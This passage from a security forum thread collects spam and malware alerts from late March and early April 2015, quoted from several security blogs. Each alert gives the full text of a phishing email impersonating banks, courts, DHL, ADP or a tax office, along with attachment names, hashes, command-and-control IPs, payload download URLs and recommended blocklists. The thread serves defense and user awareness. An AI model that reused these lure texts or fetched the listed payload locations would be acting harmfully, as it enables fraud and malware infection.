134.249.63.46: https://www.virustotal.com/en/ip-address/134.249.63.46/information/
- http://threattrack.tumblr.com/post/114585529008/citibank-spam
Mar 25, 2015
Malicious File Name and MD5:
Merchant.exe (4007601E07343ADD409490F572F97D46)
Tagged: Citibank, Upatre
___
Fake 'Invoice ID' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/03/malware-spam-invoice-id12ab34-123.html
25 Mar 2015 - "This terse spam has a malicious attachment:
From: Gerry Carpenter
Date: 25 March 2015 at 12:58
Subject: Invoice ID:34bf33
123
There is an Excel attachment with the same semi-random reference number as the subject (in the sample I saw it was 34bf33.xls) which currently has -zero- detections*. Unlike most recent document-based attacks, this does -not- contain a macro, but instead has an embedded OLE object that will run a VBscript if clicked, the spreadsheet itself is designed to get the victim to click-and-run that object.
> https://1.bp.blogspot.com/-erquBHy1ODg/VRLbYnI3WiI/AAAAAAAAGaM/o0CKQcJVoyk/s1600/excel-ole.png
Automated analysis doesn't show very much, but it does show the screenshots [1] [2]... the downloaded file is actually an EXE file all along so nothing is done to it. This file has a detection rate of 7/56**, and the Payload Security report shows it communicating with the following IPs:
92.63.88.83 (MWTV, Latvia)
82.151.131.129 (DorukNet, Turkey)
121.50.43.175 (Tsukaeru.net, Japan)
The payload is most likely Dridex.
Recommended blocklist:
92.63.88.0/24
82.151.131.129
121.50.43.175
MD5s:
ce130212d67070459bb519d67c06a291
461689d449c7b5a905c8404d3a464088 "
* https://www.virustotal.com/en/file/a233724a85833599b75ff4beab42f7ce30cb076572629ee487a7813148c9f729/analysis/1427298940/
** https://www.virustotal.com/en/file/f2328ad463d584ba06cba3338d73b1ee2ba772401d51cf0c88c51aec53bd3623/analysis/1427296948/
1] https://www.hybrid-analysis.com/sample/a233724a85833599b75ff4beab42f7ce30cb076572629ee487a7813148c9f729?environmentId=1
2] https://malwr.com/analysis/NTI5ODY2ZTdiZGIzNDllODg2ZmI4ZTQwNDcxMDBkZjc/
___
Fake 'ACH failure' SPAM - PDF malware
- http://myonlinesecurity.co.uk/ach-technical-failure-fake-pdf-malware/
25 Mar 2015 - "'ACH technical failure' pretending to come from The Electronic Payments Association <June.Parks@ nacha .org> [random names nacha .org] at with a link to a zip attachment is another one from the current bot runs... Other subjects in this series of spam malicious emails on the nacha theme are:
Transaction system failure
ACH transfer error
ACH technical failure
Your transfer failed due to technical failure ...
The email looks like:
ACH PAYMENT REJECTED
The ACH Payment (ID: 53213740992857), recently sent from your savings account (by you or any other person), was REJECTED by other financial institution.
Rejection Reason: See details in the report below
Payment Report: report_53213740992857.pdf (Adobe Reader PDF)
13450 Sunrise Valley Drive, Suite 100
Herndon, VA 20171
2014 NACHA – The Electronic Payments Association
The link once again goes to a cubby user content site...
25 March 2015: Secure_Message.zip: Extracts to: Secure_Message.exe
Current Virus total detections: 11/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/6bab36b28de36ffd08af154433a8a6204919dd71d72dffc8975d8775328aec99/analysis/1427301251/
... Behavioural information
TCP connections
216.146.38.70: https://www.virustotal.com/en/ip-address/216.146.38.70/information/
46.249.3.66: https://www.virustotal.com/en/ip-address/46.249.3.66/information/
134.249.63.46: https://www.virustotal.com/en/ip-address/134.249.63.46/information/
___
Fake DHL SPAM - malware
- http://myonlinesecurity.co.uk/dhl-awb-34-5673-0015-shipment-malware/
25 Mar 2015 - "'DHL AWB# 34 5673 0015 / shipment' pretending to come from DHL Express <info@ dhl .com> with a zip attachment is another one from the current bot runs... The email looks like:
Dear customer,
The following 1 piece(s) have been sent by a Customer via DHL Express on 22-03-2015 via AWB# 34 5673 0015
Find attached Scanned copy of the shipping documents and more information about the parcel and confirm if the address is correct for shipment.
Thank you.
25 March 2015: DOCUMENTS.zip: Extracts to: DOCUMENTS.exe - Current Virus total detections: 7/56*
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/11c549bf477589051ea2dc00058bbec761b21df16b4ece52255f6b567ca72233/analysis/1427286243/
... Behavioural information
TCP connections
66.171.248.172: https://www.virustotal.com/en/ip-address/66.171.248.172/information/
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
___
Fake 'Notice to appear in Court' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/03/malware-spam-notice-to-appear-notice-to.html
24 Mar 2015 - "These two emails come with a malicious attachment:
From: County Court [lester.hicks@ whw0095 .whservidor .com]
Date: 24 March 2015 at 16:45
Subject: AERO, Notice to Appear
This is to inform you to appear in the Court on the March 31 for your case hearing.
Please, prepare all the documents relating to the case and bring them to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.
You can review complete details of the Court Notice in the attachment.
Yours faithfully,
Lester Hicks,
Court Secretary.
-------------
From: District Court [cody.bowman@ p3nw8sh177 .shr.prod.phx3 .secureserver .net]
Date: 24 March 2015 at 16:44
Subject: AERO, Notice to appear in Court #0000310657
Dear Aero,
This is to inform you to appear in the Court on the March 28 for your case hearing.
You are kindly asked to prepare and bring the documents relating to the case to Court on the specified date.
Note: If you do not come, the case will be heard in your absence.
You can review complete details of the Court Notice in the attachment.
Sincerely,
Cody Bowman,
District Clerk.
In these two case the attachments were named Court_Notification_0000310657.zip and Notice_to_Appear_000283436.zip containing the malicious scripts Court_Notification_0000310657.doc.js [VirusTotal 7/57*]... and Notice_to_Appear_000283436.doc.js [VirusTotal 6/57**]... respectively. These scripts attempt to download malicious code... Details in the download locations vary, but are in the format:
ilarf .net/document.php?rnd=1161&id=
gurutravel .co .nz/document.php?rnd=3022&id=
This leads to a randomly-named file with a GIF extension which is actually one of two malicious EXE files, with detection rates of 6/57*** and 4/56****. One of those produces a valid Malwr report, the other smaller EXE doesn't seem to do anything. The executable that seems to do something POSTs to a Turkish server at 176.53.125.25 (Radore Veri Merkezi Hizmetleri A.S.). Various Malwr reports... indicate badness on at least the following IPs:
176.53.125.20
176.53.125.21
176.53.125.22
176.53.125.23
176.53.125.24
176.53.125.25
I would suggest blocking at least those IPs, or perhaps 176.53.125.16/28 or if you don't mind blocking access to a few legitimate Turkish sites you could perhaps block 176.53.125.16/24. I am not 100% certain of the payload, however some servers in that cluster have been fingered for serving the Trapwot fake anti-virus[5] software.
MD5s:
2d65371ac458c7d11090aca73566e3d4
da63f87243a971edca7ecd214e6fdeb1
77d8670f80c3c1de81fb2a1bf05a84b5
d48ef4bb0549a67083017169169ef3ee "
* https://www.virustotal.com/en/file/223ba74071922b52dcc71fbcd7b937c457dca1f774e4b2aaf3d1dbc220bf6f31/analysis/1427221635/
** https://www.virustotal.com/en/file/d5154ca08fe4ae6295285c410fdc25992c337b37e785c6f764f931a1b3b3d8b1/analysis/1427221612/
*** https://www.virustotal.com/en/file/b4075e73abb294254dc38465f956a39ceb7dcc31c263a7ee54b0e4d820184746/analysis/1427222714/
**** https://www.virustotal.com/en/file/daf4d96a121c9e4935082d4e0264088ff352f14d868f8720d8fa7e4f99c82f05/analysis/1427223237/
5] http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Rogue:Win32/Trapwot
:fear::fear: :mad:
AplusWebMaster
2015-03-26, 16:15
FYI...
Fake 'scanned' results SPAM - PDF malware
- http://myonlinesecurity.co.uk/lou-ann-davis-indus-precision-mfg-scanned-fake-pdf-malware/
26 Mar 2015 - "'Lou Ann Davis Indus Precision Mfg scanned' pretending to come from user <louann@ indusmfg .com> with a zip attachment is another one from the current bot runs... The email looks like:
–
Thank you,
Lou Ann Davis
Office Administrator
Indus Precision Mfg., Inc.
www .indusmfg .com
Main: (845)268-0782
Fax: (845)268-2106
26 March 2015 : Random zip name : Extracts to: scan.exe
Current Virus total detections: 3/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a2d5c1886f4eff6177b2f4ead85c92cb8d6b7c7a11845b9b9a279793008a3c89/analysis/1427372574/
___
Fake 'Invoice' SPAM - PDF malware
- http://myonlinesecurity.co.uk/yarde-metals-invoice-fake-pdf-malware/
26 Mar 2015 - "'Yarde Metals Invoice' pretending to come from email.invoice <email.invoice@ yarde .com> with a zip attachment is another one from the current bot runs... The email looks like:
Thank you for your order.
Attached is your original invoice. If you would
like to pay for
your order with a wire transfer please contact Angela Palmer
at 860-406-6311 for bank details.
Friendly reminder:
Yarde Metals terms
are 1/2% 10, Net 30. We appreciate your prompt payment.
26 March 2015: random zip name: Extracts to: 221324.exe
Current Virus total detections: 3/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4802ac489a2fca2e86f42a6e74169f9f687ad262cb4629d7e2cf84cb0710f5a5/analysis/1427380401/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
46.249.3.66: https://www.virustotal.com/en/ip-address/46.249.3.66/information/
46.160.125.167: https://www.virustotal.com/en/ip-address/46.160.125.167/information/
91.194.239.126: https://www.virustotal.com/en/ip-address/91.194.239.126/information/
93.123.40.17: https://www.virustotal.com/en/ip-address/93.123.40.17/information/
UDP communications
104.41.150.68: https://www.virustotal.com/en/ip-address/104.41.150.68/information/
___
BoA 'Over Limit' Spam
- http://threattrack.tumblr.com/post/114674089173/bank-of-america-over-limit-spam
Mar 26, 2015 - "Subjects Seen
Activity Alert: A Check Exceeded Your Requested Alert Limit
Typical e-mail details:
A check exceeded your requested alert limit
We’re letting you know a check written from your account went over the limit you set for this alert.
For more details please check attached file
Malicious File Name and MD5:
report_77076291400.scr (6B6E3D3FDE233FE75F64B517F2351D97)
.
___
Steam Codes and Countdowns - 'something for nothing'
- https://blog.malwarebytes.org/privacy-2/2015/03/steam-codes-and-countdowns/
March 26, 2015 - "... 'something for nothing' makes a reappearance in the land of -gaming- with a twist designed to get would-be winners sending messages to their online friends as fast as they possibly can. The site we’re going to examine is located at: steamcode(dot)org
... which claims they have $20 Steam Codes to give away, as the “We’re the people who give away free $20 Steam Codes!” makes clear on the frontpage. We could have an interesting philosophical debate about when free means free, but we could also just chalk it up as “free, as long as you send some links and fill in a bunch of stuff”. Here’s the nicely designed frontpage:
> https://blog.malwarebytes.org/wp-content/uploads/2015/03/stmcd1.jpg
Clicking the button reveals two things – a tantalizing glimpse of half a code, and the reveal that you must share a link with 15 people in 45 minutes or else the code will expire. If you don’t have Under Pressure on your playlist, you might want to go dig it out now:
> https://blog.malwarebytes.org/wp-content/uploads/2015/03/stmcd2.jpg
Sites don’t normally place a timer on link sending, because not many people immediately whip out a list of likely candidates to start spamming when confronted with a rapidly diminishing timer. Indeed, start quickfiring identikit messages to all and sundry and you may find more than a few of them either think you’ve been hacked or turned into a spambot for the day. Should the required amount of referrals be reached, the end result is a selection of survey pages for the would-be $20 code recipient... There’s -no- guarantee the full code will be released even with a completed survey – the only person who has anything to lose in this situation is the individual filling in whatever forms are presented, working on the basis that they’re simply hoping the website will hand over a code at the end of the process. Freebie sites offering up items such as vouchers, gift cards and game codes typically resort to surveys at some point in the chain – it’s just how they roll. Displaying a portion of the code and adding in a time sensitive instruction to send URLs to all and sundry focuses on the “So near, yet so far” pressure point, and is a great way to ensure people desperate for free game codes start yelling “How high?” before jumping."
:fear: :mad:
AplusWebMaster
2015-03-27, 12:58
FYI...
Fake ebill Invoice SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/uk-fuels-ebill-for-iso-week-201512-word-doc-or-excel-xls-spreadsheet-malware/
27 Mar 2015 - "'UK Fuels ebill for ISO Week 201512' pretending to come from invoices@ ebillinvoice .com with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/UK-Fuels-ebill-for-ISO-Week-201512.png
27 March 2015 : 22328_201512.doc
Current Virus total detections: 3/57* | 2/56** | 2/57*** | 3/57****
... So far I have seen 4 versions of this malware, but previous campaigns over the last few weeks have delivered 2, 3 or even up to 10 or 12 different versions, some with word doc attachments and some with Excel xls attachments... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/c6044a0cb8c2d1f8555939864d6e4008edf7ef81de34e94156d9529a3788127f/analysis/1427446840/
** https://www.virustotal.com/en/file/b4319a6f2bc4b60783e83a169b73a3705aabbe6ac70320bb554cd2da4528d243/analysis/1427447362/
*** https://www.virustotal.com/en/file/98996970e7a80c7d049a06205a026ccbbb3b42fa5c365a7b46df651846b41c32/analysis/1427447494/
**** https://www.virustotal.com/en/file/a934018b9b6ff900b391d18b4e9432b1d1322f6ca3bf08ca152472cc144560db/analysis/1427447285/
___
Fake 'NASA MSBA' SPAM – PDF malware
- http://myonlinesecurity.co.uk/nasa-msba-27th-2015-fake-pdf-malware/
27 Mar 2015 - "'NASA MSBA 27th, 2015' pretending to come from MSBA <NVDB@ nasa .gov> with a zip attachment is another one from the current bot runs... The email looks like:
Good Afternoon.
MSFC has posted the upcoming MSBA 27th event on NAIS and
Fed Biz Ops (Solicitation No.: SB-85515).
NAIS Posting:
Please click on
Mod. 1 Posting.
Attached is the MSBA Agenda.
Please join us for this event!
27 March 2015: Random zip name: Extracts to: MSFC.exe
Current Virus total detections: 4/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/ee6869fb6d83e858fdb35d4015209b35901ed2f1de4e2d29f5e0dc994e609ee3/analysis/1427455905/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
46.249.3.66: https://www.virustotal.com/en/ip-address/46.249.3.66/information/
UDP communications
23.99.222.162: https://www.virustotal.com/en/ip-address/23.99.222.162/information/
___
Fake 'ADP Payroll Invoice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/adp-payroll-invoice-for-week-ending-03272015-fake-pdf-malware/
27 Mar 2015 "'ADP Payroll Invoice for week ending 03/27/2015' pretending to come from user <run.payroll.invoice@ adp .com> with a zip attachment is another one from the current bot runs... The email looks like:
Your ADP Payroll invoice for last week is attached for your review. If
you have any questions regarding this invoice, please contact your ADP
service team at the number provided on the invoice for assistance.
Thank you for choosing ADP Payroll.
Important: Please do not respond to this message. It comes from an
unattended mailbox.
27 March 2015: random attachment zip name: Extracts to: ADP.exe
Current Virus total detections: 3/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/87072346dc86a5094b2b0776087e1d2ec817a3ffb65b0f1332562ce251628a32/analysis/1427467488/
___
Fake 'Information Request' SPAM – PDF malware
- http://myonlinesecurity.co.uk/nicksen-stone-information-request-fake-pdf-malware/
27 Mar 2015 - "'Information Request' pretending to come from Nicksen Stone <sale20@ thrivigor .com> with a zip attachment is another one from the current bot runs...
Hello,
We specialize in designing and manufacturing high quality metal and
plastic parts suitable for electronic,industrial,agricultural and
various applications.
If you need any parts please feel free to send us drawing or sample for
free quotes. Thank you.
With Kind Regards,
Nicksen Stone, Director
Ningbo Efforteam Machinery Co.,Ltd
Phone: +86-13777 101 355
27 March 2015: Random attachment zip name: Extracts to: Information.exe
Current Virus total detections: 3/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/66bbe7a968b41adbf5c391f0c02aba85ac3309513f22e7a773969b6825e6fc51/analysis/1427472615/
... Behavioural information
TCP connections
216.146.38.70: https://www.virustotal.com/en/ip-address/216.146.38.70/information/
46.249.3.66: https://www.virustotal.com/en/ip-address/46.249.3.66/information/
66.147.244.169: https://www.virustotal.com/en/ip-address/66.147.244.169/information/
UDP communications
104.41.150.68: https://www.virustotal.com/en/ip-address/104.41.150.68/information/
:fear::fear: :mad:
AplusWebMaster
2015-03-30, 15:38
FYI...
Fake 'Vistaprint Invoice' SPAM - pdf malware
- http://myonlinesecurity.co.uk/vistaprint-vat-invoice-fake-pdf-malware/
30 Mar 2015 - "'Vistaprint VAT Invoice' (random number) pretending to come from Vistaprint <VistaPrint-cc@ vistaprint .com> with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Vistaprint-VAT-Invoice.png
30 March 2015: Random Attachment zip name: Extracts to: Invoice_1.exe
Current Virus total detections: 1/56* ... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/135dbe562db4f5ddd3bc6d7e49460197cf5487a904efc393dd7a8a3876860d68/analysis/1427714331/
___
Fake 'ADP invoice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/adp-invoice-for-week-ending-30032015-fake-pdf-malware/
30 Mar 2015 - "'ADP invoice for week ending 30/03/2015' pretending to come from Wilbert.Downs@ adp .com with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/ADP-invoice-for-week-ending.png
30 March 2015: invoice_285699291.zip: Extracts to: invoice_285699291.scr
Current Virus total detections: 5/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f3ee72113a3e153ee1fd078e2e5bd2c5617a29d77ba62af7d383d61d29ba74bc/analysis/1427728309/
___
Fake 'PDF SWIFT TT COPY' SPAM – PDF malware
- http://myonlinesecurity.co.uk/pdf-swift-tt-copy-fake-pdf-malware/
30 Mar 2015 - "'PDF SWIFT TT COPY' pretending to come from soumiya@ ulckuwait .com with a zip attachment is another one from the current bot runs... The email looks like:
Hello,
Regarding payments for the outstanding, our accounting department have
approved immediate payment to your accounts.
Please attached is the Payment confirmation slip ,Kindly help reply
urgently to confirm to us
Best Regards,
Kosta Curic
EVRO – TURS DOO
Po?e?ka 80, Beograd, Srbija
Jenneth Setu
Purchase Manager
30 March 2015: Payment Confirmation pdf.zip: Extracts to: Payment Confirmation pdf.exe
Current Virus total detections: 8/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/3e4001f856343a0d6fb685e85658ddd524491c05de63df1634b6d6f04a723b33/analysis/1427732925/
___
Fake 'Quotation' SPAM - PDF malware
- http://myonlinesecurity.co.uk/mark-kemsley-quotation-qzvnvm-fake-pdf-malware/
30 Mar 2015 - "'Quotation qzVNVm: (random characters)' pretending to come from Mark Kemsley <mark.kemsley@ energy-solutions .co.uk> with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/quotation.png
30 March 2015 : random Attachment zip name: Extracts to: Quotation.exe
Current Virus total detections: 5/50* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/1a56353bf1cb73db3a72832f8f8255f500f4a41bbab18203d7e37f349eed789f/analysis/1427738877/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
141.105.141.87: https://www.virustotal.com/en/ip-address/141.105.141.87/information/
79.133.196.204: https://www.virustotal.com/en/ip-address/79.133.196.204/information/
UDP communications
23.101.187.68: https://www.virustotal.com/en/ip-address/23.101.187.68/information/
:fear: :mad:
AplusWebMaster
2015-03-31, 15:22
FYI...
Fake 'PO' SPAM - doc or xls malware
- http://myonlinesecurity.co.uk/your-po-sp14619-new-era-contract-sales-word-doc-or-excel-xls-spreadsheet-malware/
31 Mar 2015 - "'Your PO: SP14619' pretending to come from Sam S. <sales@ alicorp .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Your-PO-SP14619.png
31 March 2015 : APIPO1.doc - Current Virus total detections: 3/52* | 5/57**
... at least one of the macros downloads http ://probagep.sandbox.proserver .hu/54/78.exe (Virus Total***)... previous campaigns over the last few weeks have delivered 2 or 3 or even up to 10 or 12 different versions, some with word doc attachments and some with Excel xls attachments... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/323858d729f1b817e46ba5611dcc3db4f75ab5aff755816ac0f3377fe00ad205/analysis/1427789087/
** https://www.virustotal.com/en/file/978632b2fdf4f7e360cc797538b69ca066f75369afeef1796dabdadcf71ff1cb/analysis/1427789118/
*** https://www.virustotal.com/en/file/8915e7dbb54828092c498ec868aa5e02485e6f229b513ad901223fd7d36620ee/analysis/1427788227/
- http://blog.dynamoo.com/2015/03/malware-spam-your-po-sp14619-sam-s.html
31 Mar 2015
... Recommended blocklist:
91.230.60.0/24
185.91.175.0/24
46.101.38.178
87.236.215.103
66.110.179.66
176.108.1.17
202.44.54.5
128.199.203.165
95.163.121.178 "
___
Fake 'Latest Docs' SPAM - doc or xls malware
- http://myonlinesecurity.co.uk/your-latest-documents-from-rs-components-word-doc-or-excel-xls-spreadsheet-malware/
31 Mar 2015 - "'Your Latest Documents from RS Components' coming from random names at random companies from with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Your-Latest-Documents-from-RS-Components.png
31 March 2015: G-A7835690138927462557376-1.doc - Current Virus total detections: 0/56*
... only seeing 1 version of this malware, but previous campaigns over the last few weeks have delivered 2 or 3 or even 10 or 12 different versions, some with word doc attachments and some with Excel xls attachments... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/1560f91fb7a024b3ba2e934c8cbcdb5cb2a1c4e41e7e8690ff3a7d952f0d7937/analysis/1427798514/
- http://blog.dynamoo.com/2015/03/malware-spam-83433-your-latest.html
31 Mar 2015
... Recommended blocklist:
188.120.225.17
1.164.114.195
2.194.41.9
46.19.143.151
199.201.121.169 "
___
Fake 'Passport Copy' SPAM - doc or xls malware
- http://myonlinesecurity.co.uk/fw-passport-copy-humdsolicitors-co-uk-word-doc-or-excel-xls-spreadsheet-malware/
31 Mar 2015 - "FW: Passport copy pretending to come from salim@ humdsolicitors .co.uk with what is supposed to be a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Passport-copy.png
31 March 2015 : passport.doc ...
- http://blog.dynamoo.com/2015/03/malware-spam-fw-passport-copy.html
31 Mar 2015 - "This fake legal spam comes with a malicious attachment. It appears to be a forwarded message from a solicitors office, but it is just a simple forgery... The attachment is named passport.doc. It is exactly the -same- malicious payload as the one used in this spam run earlier today*, and it drops the Dridex banking trojan on the victim's PC."
* http://blog.dynamoo.com/2015/03/malware-spam-your-po-sp14619-sam-s.html
___
Fake 'Debit Note' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/debit-note-97808-information-attached-to-this-email-word-doc-or-excel-xls-spreadsheet-malware/
31 Mar 2015 - "'Debit Note [random numbers]' information attached to this email coming from random name and email addresses with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email has a completely -blank- body...
31 March 2015 : random name .doc - Current Virus total detections: 0/56* | 0/56** | 0/56*** ..."
* https://www.virustotal.com/en/file/bacb4de5ae01f2fcc3a080633feb856597d2b388205217756b8c5e3a50c041db/analysis/1427808913/
** https://www.virustotal.com/en/file/715852e4d27665050e48ec7bc1b5838aa27f986918c215b3c906d0f07d6dd3ea/analysis/1427807988/
*** https://www.virustotal.com/en/file/c5cc2f88fef95f658c90f8a1e3518d75b15b504d8a184fd100d458e8891f6dd1/analysis/1427808948/
- http://blog.dynamoo.com/2015/03/malware-spam-debit-note-12345.html
31 Mar 2015 - "This fake financial spam comes with a malicious attachment. There is -no- body text... The executable downloaded is identical to the one used in this spam run* also taking place today. The payload is the Dridex banking trojan."
* http://blog.dynamoo.com/2015/03/malware-spam-83433-your-latest.html
___
Fake 'Your returns label' SPAM – PDF malware
- http://myonlinesecurity.co.uk/collectplus-your-returns-label-fake-pdf-malware/
31 Mar 2015 - "'CollectPlus :: Your returns label' pretending to come from info <info@ collectplus .co.uk> with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/CollectPlus-Your-returns-label.png
31 March 2015 : Random Attachment zip name: Extracts to: Reference.exe
Current Virus total detections: 3/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e9f70dc57429e9af040890c2839f0e3c318432c6c9fd8c41d9277a64f19f4127/analysis/1427800182/
___
World Back Up Day ...
- https://blog.malwarebytes.org/news/2015/03/world-back-up-day-file-safety-first/
Mar 31, 2015 - "If your response to the question “When did you last back up?” is something to do with parking your car, then you should really take note of World Back Up Day*...
* http://www.worldbackupday.com/en/
According to the World Back Up Day statistics:
• 30% of people have never backed up their data.
• 113 phones are stolen / lost every minute (Ouch. You may want to invest in some remote wipe technology too).
• 29% of data deletion disasters are caused by accident..."
:fear: :mad:
AplusWebMaster
2015-04-01, 13:47
FYI...
Fake 'Tax Refund' SPAM - malware
- http://blog.dynamoo.com/2015/04/malware-spam-australian-taxation-office.html
1 Apr 2015 - "This fake tax notification spam leads to malware hosted on Cubby.
From: Australian Taxation Office [noreply@ ato .gov .au]
Date: 1 April 2015 at 00:51
Subject: Australian Taxation Office - Refund Notification
IMPORTANT NOTIFICATION
Australian Taxation Office - 31/03/2015
After the last calculation of your fiscal activity we have determined that you are eligible to receive a refund of 2307.15 AUD.
To view/download your tax notification please click here or follow the link below :
https ://www .ato .gov .au/AZItems.aspx?id=3673&category=Tax+legislation+and+regulations&sorttype=azindexdisplay&Disp=True?NotificationCode=notification_0354003
Laurence Thayer, Tax Refund Department Australian Taxation Office
The names and the numbers -change- from email to email. Despite the displayed URL in the message, the link actually goes to cubbyusercontent .com (e.g. https ://www.cubbyusercontent .com/pl/RYR5601763.zip/_33cdead4ebfe45179a32ee175b49c399) but these download locations don't last very long as there is a quota on each download. In this case, the downloaded file is RYR5601763.zip which contains a malicious executable RYR5601763.scr which has a VirusTotal detection rate of 20/57*. Automated analysis tools... show that it downloads components from:
ebuyswap .co.uk/mandoc/muz3.rtf
eastmountinc .com/mandoc/muz3.rtf
It then attempts to phone home to:
141.105.141.87:13819/3103us13/HOME/41/7/4/
That IP is allocated to Makiyivka Online Technologies Ltd in Ukraine. In addition, it looks up the IP address of the computer at checkip .dyndns .org. Although this is benign, monitoring for it can be a good indicator of infection. These URL requests are typical of the Upatre downloader. According to the Malwr report it drops another binary jydemnr66.exe with a detection rate of 11/55** plus a benign PDF file entitled "War by remote control" which acts as some sort of cover for the infection process.
Recommended blocklist:
141.105.140.0/22
ebuyswap .co.uk
eastmountinc .com "
* https://www.virustotal.com/en/file/7ac09282cc511758e59c72521151071b3feef7824aa25be51cb0e640ed747d98/analysis/1427874847/
** https://www.virustotal.com/en/file/08ad3d332bca4444de8a05429b3925edafd83be61b0dd57a76e73207bec19981/analysis/1427876163/
___
Fake 'Delivery Note' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/cih-delivery-note-0051037484-word-doc-or-excel-xls-spreadsheet-malware/
1 Apr 2015 - "'CIH Delivery Note 0051037484' pretending to come from Batchuser BATCHUSER <ecommsupport@ cihgroup .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
This email and the information it contains are private, may be confidential and are for the intended recipient only. If you received this email in error please notify the sender immediately, confirm that it has been deleted from your system and that all copies have been destroyed. You should not copy it for any purpose or disclose its contents to any other person.
Internet communications are not secure and therefore CIH does not accept legal responsibility for the contents of this message.
We use reasonable endeavours to virus scan all outgoing emails but no warranty is given that this email and any attachments are virus free. You should undertake your own virus checking. We reserve the right to monitor email communications through our networks.
Combined Independents (Holdings) Ltd is registered in England No 767658 and has its registered offices at
Euro House, Joule Road, Andover, SP10 3GD
1 April 2015 :CIH Delivery Note 0051037484.doc
Current Virus total detections: 0/56* | 0/56** | 0/56*** | 0/56****
So far I have seen 4 versions of this malware... some with word doc attachments and some with Excel xls attachments... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/8cfb304671aef3b130f7c29ceb5d716c2ca5ecaae76be25370e66845506c5147/analysis/1427875359/
** https://www.virustotal.com/en/file/8cfb304671aef3b130f7c29ceb5d716c2ca5ecaae76be25370e66845506c5147/analysis/1427875359/
*** https://www.virustotal.com/en/file/11f7086034738b883874ecf9ba2c065df062996853d4cad262bdef67bfc62441/analysis/1427875320/
**** https://www.virustotal.com/en/file/672bb3708f164e3fc7d82c559edb71c081b74c65b3b55d49575a0510bc14169f/analysis/1427875511/
- http://blog.dynamoo.com/2015/04/malware-spam-batchuser-batchuser.html
1 Apr 2015 - "The CIH Group is the name behind the Euronics brand. They are not sending out this spam, instead it is a simple forgery with a malicious attachment...
Recommended blocklist:
91.242.163.70
37.139.47.81
72.167.62.27
212.227.89.182
46.228.193.201
46.101.49.125
198.245.70.182
95.211.184.249 "
___
Fake 'Sales_Order' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/sales_order_6100152-kosnic-com-hazel-gough-word-doc-or-excel-xls-spreadsheet-malware/
